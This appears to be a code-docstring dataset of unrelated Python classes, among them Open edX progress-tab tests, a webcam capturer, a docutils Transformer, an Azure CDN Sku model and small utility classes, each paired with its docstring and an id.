@override_waffle_flag(COURSE_HOME_MICROFRONTEND, active=True) <NEW_LINE> @ddt.ddt <NEW_LINE> class ProgressTabTestViews(BaseCourseHomeTests): <NEW_LINE> <INDENT> def setUp(self): <NEW_LINE> <INDENT> super().setUp() <NEW_LINE> self.url = reverse('course-home-progress-tab', args=[self.course.id]) <NEW_LINE> <DEDENT> @ddt.data(CourseMode.AUDIT, CourseMode.VERIFIED) <NEW_LINE> def test_get_authenticated_enrolled_user(self, enrollment_mode): <NEW_LINE> <INDENT> CourseEnrollment.enroll(self.user, self.course.id, enrollment_mode) <NEW_LINE> response = self.client.get(self.url) <NEW_LINE> self.assertEqual(response.status_code, 200) <NEW_LINE> self.assertIsNotNone(response.data['courseware_summary']) <NEW_LINE> for chapter in response.data['courseware_summary']: <NEW_LINE> <INDENT> self.assertIsNotNone(chapter) <NEW_LINE> <DEDENT> self.assertIn('settings/grading/' + str(self.course.id), response.data['studio_url']) <NEW_LINE> self.assertEqual(response.data['credit_support_url'], CREDIT_SUPPORT_URL) <NEW_LINE> self.assertIsNotNone(response.data['verification_data']) <NEW_LINE> self.assertEqual(response.data['verification_data']['status'], 'none') <NEW_LINE> if enrollment_mode == CourseMode.VERIFIED: <NEW_LINE> <INDENT> ManualVerification.objects.create(user=self.user, status='approved') <NEW_LINE> response = self.client.get(self.url) <NEW_LINE> self.assertEqual(response.data['verification_data']['status'], 'approved') <NEW_LINE> self.assertIsNone(response.data['certificate_data']) <NEW_LINE> <DEDENT> elif enrollment_mode == CourseMode.AUDIT: <NEW_LINE> <INDENT> self.assertEqual(response.data['certificate_data']['cert_status'], 'audit_passing') <NEW_LINE> <DEDENT> <DEDENT> def test_get_authenticated_user_not_enrolled(self): <NEW_LINE> <INDENT> response = self.client.get(self.url) <NEW_LINE> self.assertEqual(response.status_code, 302) <NEW_LINE> <DEDENT> def test_get_unauthenticated_user(self): <NEW_LINE> <INDENT> self.client.logout() <NEW_LINE> response = self.client.get(self.url) <NEW_LINE> self.assertEqual(response.status_code, 403) <NEW_LINE> <DEDENT> def test_get_unknown_course(self): <NEW_LINE> <INDENT> url = reverse('course-home-progress-tab', args=['course-v1:unknown+course+2T2020']) <NEW_LINE> response = self.client.get(url) <NEW_LINE> self.assertEqual(response.status_code, 404) <NEW_LINE> <DEDENT> def test_masquerade(self): <NEW_LINE> <INDENT> user = UserFactory() <NEW_LINE> set_user_preference(user, 'time_zone', 'Asia/Tokyo') <NEW_LINE> CourseEnrollment.enroll(user, self.course.id) <NEW_LINE> self.switch_to_staff() <NEW_LINE> self.assertIsNone(self.client.get(self.url).data['user_timezone']) <NEW_LINE> self.update_masquerade(username=user.username) <NEW_LINE> self.assertEqual(self.client.get(self.url).data['user_timezone'], 'Asia/Tokyo')
Tests for the Progress Tab API
62599068d6c5a102081e38d2
class Capturer(object): <NEW_LINE> <INDENT> def __init__(self, channel=0, cam_width=800, cam_height=600): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> self._camera = cv2.VideoCapture(channel) <NEW_LINE> <DEDENT> except Exception as e: <NEW_LINE> <INDENT> sys.exit('Unable to use the webcam, error: %s' % str(e)) <NEW_LINE> <DEDENT> self._frame = None <NEW_LINE> self.cam_width = cam_width <NEW_LINE> self.cam_height = cam_height <NEW_LINE> self._channel = channel <NEW_LINE> self._camera.set(cv2.CAP_PROP_FRAME_WIDTH, cam_width) <NEW_LINE> self._camera.set(cv2.CAP_PROP_FRAME_HEIGHT, cam_height) <NEW_LINE> <DEDENT> def get_camera_width_heigth(self): <NEW_LINE> <INDENT> return self.cam_width, self.cam_height <NEW_LINE> <DEDENT> def get_frame(self): <NEW_LINE> <INDENT> _, frame = self._camera.read() <NEW_LINE> return frame <NEW_LINE> <DEDENT> def release(self): <NEW_LINE> <INDENT> self._camera.release()
provides interface to the camera #TODO: automatize process of capturing by testing each channel
62599068cc0a2c111447c6a5
class JsonDict(dict): <NEW_LINE> <INDENT> def __getattr__(self, attr): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> return self[attr] <NEW_LINE> <DEDENT> except KeyError: <NEW_LINE> <INDENT> raise AttributeError(r"'JsonDict' object has no attribute '%s'" % attr) <NEW_LINE> <DEDENT> <DEDENT> def __setattr__(self, attr, value): <NEW_LINE> <INDENT> self[attr] = value <NEW_LINE> <DEDENT> def __getstate__(self): <NEW_LINE> <INDENT> return self.copy() <NEW_LINE> <DEDENT> def __setstate__(self, state): <NEW_LINE> <INDENT> self.update(state)
general json object that allows attributes to be bound to and also behaves like a dict
6259906821bff66bcd724411
class InvalidParameter(InvalidParameters): <NEW_LINE> <INDENT> default_message = _("Invalid value for parameter {param}.") <NEW_LINE> def __init__(self, message=None, *, param, **kwargs): <NEW_LINE> <INDENT> super().__init__(message) <NEW_LINE> self.kwargs = {**kwargs, "param": param}
Invalid initialization parameter PARAM received from the request. Takes a `param` kwarg
6259906816aa5153ce401c85
class CapsOnStatus(IntervalModule): <NEW_LINE> <INDENT> interval = 2 <NEW_LINE> def caps_lock_status(self): <NEW_LINE> <INDENT> pwd = ( '/home/thorgeir/github/thorgeir/' 'i3wm-config-thorgeir/custom_status_bar' ) <NEW_LINE> if not os.path.exists(pwd): <NEW_LINE> <INDENT> pwd = os.path.dirname(os.path.realpath(__file__)) <NEW_LINE> <DEDENT> process = subprocess.Popen( ["bash", "{0}/caps_status.sh".format(pwd)], stdout=subprocess.PIPE ) <NEW_LINE> output, error = process.communicate() <NEW_LINE> output = output.decode('utf-8') <NEW_LINE> return output.split('\n')[0] <NEW_LINE> <DEDENT> def run(self): <NEW_LINE> <INDENT> caps_colors = { 'off': '#00ff00', 'on': '#ff0000' } <NEW_LINE> full_text = u'■'*30 <NEW_LINE> self.output = { 'full_text': full_text, 'color': caps_colors[self.caps_lock_status()] }
Show big colorful status bar
6259906866673b3332c31ba9
class NpcBrain(Brain): <NEW_LINE> <INDENT> def __init__(self, go): <NEW_LINE> <INDENT> Brain.__init__(self, go, delay_first = 2, next_thought = self.start) <NEW_LINE> <DEDENT> def start(self): <NEW_LINE> <INDENT> self.go.position = self.go.start_position <NEW_LINE> return self.follow_right <NEW_LINE> <DEDENT> def follow_right(self): <NEW_LINE> <INDENT> if not self.go.gs.maze.blocks(self.go, 90): <NEW_LINE> <INDENT> self.go.turn(90) <NEW_LINE> self.wait(1) <NEW_LINE> return self.go_fwd_one <NEW_LINE> <DEDENT> if self.go.gs.maze.blocks(self.go, 0): <NEW_LINE> <INDENT> self.go.turn(-90) <NEW_LINE> self.wait(1) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.go.fwd() <NEW_LINE> self.wait(1) <NEW_LINE> <DEDENT> <DEDENT> def go_fwd_one(self): <NEW_LINE> <INDENT> self.go.fwd() <NEW_LINE> self.wait(1) <NEW_LINE> return self.follow_right
Class to model an NPC's brain, i.e., follow the right hand wall.
625990685166f23b2e244b7e
class NoFaceDetected(Exception): <NEW_LINE> <INDENT> def __init__(self) -> None: <NEW_LINE> <INDENT> self.message = "No face found in image!!"
Raised when no face is detected in an image Attributes: message: (str) Exception message
62599068462c4b4f79dbd1b3
class Sku(Model): <NEW_LINE> <INDENT> _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, } <NEW_LINE> def __init__(self, name=None): <NEW_LINE> <INDENT> super(Sku, self).__init__() <NEW_LINE> self.name = name
The pricing tier (defines a CDN provider, feature list and rate) of the CDN profile. :param name: Name of the pricing tier. Possible values include: 'Standard_Verizon', 'Premium_Verizon', 'Custom_Verizon', 'Standard_Akamai', 'Standard_ChinaCdn' :type name: str or ~azure.mgmt.cdn.models.SkuName
62599068cc40096d6161adb6
class Transformer(TransformSpec): <NEW_LINE> <INDENT> from docutils.transforms import universal <NEW_LINE> default_transforms = (universal.Decorations, universal.FinalChecks, universal.Messages) <NEW_LINE> def __init__(self, document): <NEW_LINE> <INDENT> self.transforms = [] <NEW_LINE> self.document = document <NEW_LINE> self.applied = [] <NEW_LINE> self.sorted = 0 <NEW_LINE> self.components = {} <NEW_LINE> self.serialno = 0 <NEW_LINE> <DEDENT> def add_transform(self, transform_class, priority=None): <NEW_LINE> <INDENT> if priority is None: <NEW_LINE> <INDENT> priority = transform_class.default_priority <NEW_LINE> <DEDENT> priority_string = self.get_priority_string(priority) <NEW_LINE> self.transforms.append((priority_string, transform_class, None)) <NEW_LINE> self.sorted = 0 <NEW_LINE> <DEDENT> def add_transforms(self, transform_list): <NEW_LINE> <INDENT> for transform_class in transform_list: <NEW_LINE> <INDENT> priority_string = self.get_priority_string( transform_class.default_priority) <NEW_LINE> self.transforms.append((priority_string, transform_class, None)) <NEW_LINE> <DEDENT> self.sorted = 0 <NEW_LINE> <DEDENT> def add_pending(self, pending, priority=None): <NEW_LINE> <INDENT> transform_class = pending.transform <NEW_LINE> if priority is None: <NEW_LINE> <INDENT> priority = transform_class.default_priority <NEW_LINE> <DEDENT> priority_string = self.get_priority_string(priority) <NEW_LINE> self.transforms.append((priority_string, transform_class, pending)) <NEW_LINE> self.sorted = 0 <NEW_LINE> <DEDENT> def get_priority_string(self, priority): <NEW_LINE> <INDENT> self.serialno += 1 <NEW_LINE> return '%03d-%03d' % (priority, self.serialno) <NEW_LINE> <DEDENT> def populate_from_components(self, components): <NEW_LINE> <INDENT> self.add_transforms(self.default_transforms) <NEW_LINE> for component in components: <NEW_LINE> <INDENT> if component is None: <NEW_LINE> <INDENT> continue <NEW_LINE> <DEDENT> self.add_transforms(component.default_transforms) <NEW_LINE> self.components[component.component_type] = component <NEW_LINE> <DEDENT> self.sorted = 0 <NEW_LINE> <DEDENT> def apply_transforms(self): <NEW_LINE> <INDENT> self.document.reporter.attach_observer( self.document.note_transform_message) <NEW_LINE> while self.transforms: <NEW_LINE> <INDENT> if not self.sorted: <NEW_LINE> <INDENT> self.transforms.sort() <NEW_LINE> self.transforms.reverse() <NEW_LINE> self.sorted = 1 <NEW_LINE> <DEDENT> priority, transform_class, pending = self.transforms.pop() <NEW_LINE> transform = transform_class(self.document, startnode=pending) <NEW_LINE> transform.apply() <NEW_LINE> self.applied.append((priority, transform_class, pending))
Stores transforms (`Transform` classes) and applies them to document trees. Also keeps track of components by component type name.
6259906891f36d47f2231a65
class Task(dict): <NEW_LINE> <INDENT> __id = None <NEW_LINE> due_date = None <NEW_LINE> assignee = None <NEW_LINE> value = None <NEW_LINE> status = None <NEW_LINE> def __init__(self): <NEW_LINE> <INDENT> super(Task, self).__init__() <NEW_LINE> self.set_id() <NEW_LINE> <DEDENT> def get_id(self): <NEW_LINE> <INDENT> return self["__id"] <NEW_LINE> <DEDENT> def set_id(self): <NEW_LINE> <INDENT> self["__id"] = str(uuid.uuid4()) <NEW_LINE> <DEDENT> def get_due_date(self): <NEW_LINE> <INDENT> return self["due_date"] <NEW_LINE> <DEDENT> def set_due_date(self, due_date): <NEW_LINE> <INDENT> self["due_date"] = due_date <NEW_LINE> <DEDENT> def get_assignee(self): <NEW_LINE> <INDENT> return self["assignee"] <NEW_LINE> <DEDENT> def set_assignee(self, assignee): <NEW_LINE> <INDENT> self["assignee"] = assignee <NEW_LINE> <DEDENT> def get_value(self): <NEW_LINE> <INDENT> return self["value"] <NEW_LINE> <DEDENT> def set_value(self, value): <NEW_LINE> <INDENT> self.assignee = value <NEW_LINE> <DEDENT> def get_status(self): <NEW_LINE> <INDENT> return self["status"] <NEW_LINE> <DEDENT> def set_status(self, status): <NEW_LINE> <INDENT> self["status"] = status
Task object inherited from Python builtin dictionary object to store data inside Actually I wish to use SQLAlchemy but forgave because of package dependency. It can be moderated by SQLAlchemy entity easier than this way.
6259906832920d7e50bc77f3